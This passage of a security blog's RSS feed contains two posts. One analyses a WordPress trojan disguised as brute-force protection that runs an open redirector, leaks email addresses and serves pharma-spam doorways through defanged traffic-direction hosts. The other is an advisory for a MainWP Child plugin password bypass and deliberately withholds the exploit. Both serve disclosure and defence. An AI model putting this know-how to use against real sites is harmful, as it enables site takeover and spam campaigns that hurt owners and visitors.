<p>So it seems to be a useful benign software. Right? Not that fast. As I told the wp-core.php file had more than <strong>500</strong> lines of code and this “bootstrap” code accounts to less than 100 of them. So what does the remaining <strong>80%</strong> of code do?</p>
<h3>The malicious part of wp-core.php</h3>
<p>The rest of the code doesn’t have anything to do with protection. Actually, it does the exact opposite.</p>
<p>For example, it can <strong>show all email addresses</strong> stored in WordPress database (this function is buggy and won’t work for many WP installations though). So who needs the email authentication step of that protection if no authorization is required to extract the emails?</p>
<p>It also installs an <strong>open redirector</strong>. Now hackers can use sites with such a “bruteforce protection” in their email spam, phishing and malware campaigns — they will redirect visitors to whatever websites hackers specify.</p>
<h3>Doorways</h3>
<p>But the main function of <strong>wp-core.php</strong> is managing <strong>pharma-spam doorways</strong>. If a blog URL has a specific parameter (for example “<strong>th</strong>“, like <em>h t t p://www .example .com/?<strong>th</strong>=doryx+150mg+exclusivity)</em> then <strong>wp-core.php</strong> begins to serve spammy content instead of the normal blog content.</p>
<p>If visitors are not bots and come from majors search engine Search Engine Result Pages (SERPs), they get redirected to a pharma TDS (traffic directing system) passing alone the keywords of the visited doorway. Right now they use these two TDS':</p>
<ul>
<li><span style="color:#993300">hxxp:// alltds .com/v2/search.html?key=…</span></li>
<li><span style="color:#993300">hxxp:// besttdsfarma .com/site/search?q=…</span></li>
<ul>
<div id="attachment_12148" style="width: 610px" class="wp-caption aligncenter"><a href="http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html/redirect-up-result-2" rel="attachment wp-att-12148"><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/redirect-up-result1.gif" alt="Redirects Detected by  Unmask Parasites" width="600" height="125" class="size-full wp-image-12148" /></a><p class="wp-caption-text">Redirects Detected by <a href="http://www.unmaskparasites.com/" target="_blank"> Unmask Parasites</a></p></div>
<p>Before the redirect, the malware sets a cookie with the same name as the doorway URL parameter (in case of <em>?<strong>th</strong>=doryx+150mg+exclusivity</em> URL, the cookie name will be “<strong>th</strong>“) for the next <strong>100</strong> days so that if the same visitors open this page again (even without a search engine as a referrer) they will be redirected again.</p>
<p>If the visitor doesn’t have that cookie, doesn’t come from search results or is a bot, then such a visitor is shown a pure spam page staffed with lots of pharma keywords and links to doorways on other sites used by the same black hat SEO campaign.</p>
<p>The content of the spammy doorways is stored in the <strong>wp-admin/update-backup.db</strong> file.</p>
<h3>Not Specific to WordPress Only</h3>
<p>I should mention that although this malware is supposed to work on WordPress sites (WP-specific brute-force protection, paths and filenames, ability to generate doorways using current WP-theme, etc.) it will work just as well on other PHP sites that use <strong>index.php</strong> as a default index file. The only difference is the WP-specific function will no longer be used and doorways will be generated using the pre-built template in the <strong>update-backup.db</strong> file, which in case of non-WP site will be stored in the root directory.</p>
<h3>Summary</h3>
<p>This malware is really strange.</p>
<ul>
<li>It tries to target all kinds of PHP sites and has to inject itself into <strong>index.php</strong> (which can be found literally on any PHP site). But at the same time the main target of the campaign is WordPress sites.</li>
<li>That’s why it uses the <strong>wp-core.php</strong> file name, which doesn’t visually stand out from the other legitimate WordPress files that you can find in the root directory. But this very file name will be suspicious on, say, Joomla or vBulletin sites.</li>
<li><strong>Index.php</strong> and <strong>wp-login.php</strong> injections, along with the new wp-core.php file can be easily detected by most security plugins that check integrity of core WordPress files. To make such injections less suspicious the malware contains code that adds useful features to WordPress.</li>
<li>Although the “brute-force protection” features do work, the malware author chose to place the its code in the middle of the <strong>wp-core.php</strong> file making them less prominent. And the first non-comment lines of that file show that it tries to steal sensitive information. So why bother with real “protection” code if those who can read PHP see the malicious code first, and for those who don’t read PHP, the comments at the top of the file should be enough.</li>
<li>BTW, it’s typical for hackers to hide malicious code inside larger legitimate files. They usually get some existing plugin or module and add their own code there. In this particular case, I couldn’t find the source of that “brute-force protection” code. Either it comes from a lesser known premium plugin or the hackers wrote it themselves!</li>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/inverted-wordpress-trojan.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Security Advisory: MainWP-Child WordPress Plugin</title>
		<link>http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html</link>
		<comments>http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html#comments</comments>
		<pubDate>Mon, 09 Mar 2015 23:56:20 +0000</pubDate>
		<dc:creator><![CDATA[Mickael Nadeau]]></dc:creator>
				<category><![CDATA[Vulnerability Disclosure]]></category>
		<category><![CDATA[WordPress Security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=12134</guid>
		<description><![CDATA[Security Risk: Critical Exploitation level: Very Easy/Remote DREAD Score: 9/10 Vulnerability: Password bypass / Privilege Escalation Patched Version:  2.0.9.2 During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administration<a class="more-link" href="http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p><strong>Security Risk:</strong> Critical<br />
<strong>Exploitation level: </strong>Very Easy/Remote<br />
<strong>DREAD Score:</strong> 9/10<br />
<strong>Vulnerability:</strong> Password bypass / Privilege Escalation<br />
<strong>Patched Version:  </strong><a href="https://wordpress.org/plugins/mainwp-child/">2.0.9.2</a></p>
<p>During a routine audit of our Website Firewall (WAF), we found a critical vulnerability affecting the popular MainWP Child WordPress plugin. According to worpdress.org, it is installed on more than 90,000 WordPress sites as as remote administration tool. We contacted the MainWP team last week and they <a href="https://wordpress.org/plugins/mainwp-child/">patched the vulnerability in version 2.0.9.2 last Friday</a>.</p>
<p><em>Per the developers request, following <a href="http://blog.sucuri.net/2015/02/vulnerability-disclosures-a-note-to-developers.html" target="_blank">guidance provided in our Note to Developers</a>, we delayed our disclosure to allow users time to update. </em></p>
<h5>What are the risks?</h5>
<p>This vulnerability allows anyone to login as an administrator only by knowing the target user&#8217;s handle (password bypass). It is very simple to exploit and a big deal as security tools like WPScan already automate the process of grabbing a list of usernames from WordPress sites.</p>
<p>Clients using our <strong><a href="http://sucuri.net/website-firewall/stop-website-attacks-and-hacks">Website Firewall</a></strong> are already protected against this issue.</p>
<h5>Technical details</h5>
<p><i>*Due to the severity we will not provide a Proof of Concept and will be very light on the technical details. Make sure to update asap!</i></p>
<p>Unfortunately, this vulnerability is easy to exploit. It uses WordPress the &#8220;init&#8221; hook to trigger MainWP&#8217;s remote control mechanism.</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/mainwp2.png" alt="mainwp2" width="603" height="164" class="aligncenter size-full wp-image-12136" /></p>
<p>Inside this function (executed by “init”), we found the authentication check wasn&#8217;t sufficient as it allows anyone to trigger the plugin&#8217;s user login mechanism, thus making it possible for an attacker to take over any administrator account.</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2015/03/mainwpday0.png" alt="mainwpday0" width="986" height="401" class="aligncenter size-full wp-image-12135" /></p>
<p>As an administrator user, the attacker is able to take full control of the website. </p>
<h5>Update as soon as possible!</h5>
<p>Again, if you’re using a vulnerable version of this plugin, update as soon as possible! In the event where you can not do this, we strongly recommend leveraging our <a href="http://sucuri.net/website-firewall/stop-website-attacks-and-hacks">Website Firewall</a> to get it patched virtually.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2015/03/security-advisory-mainwp-child-wordpress-plugin.html/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
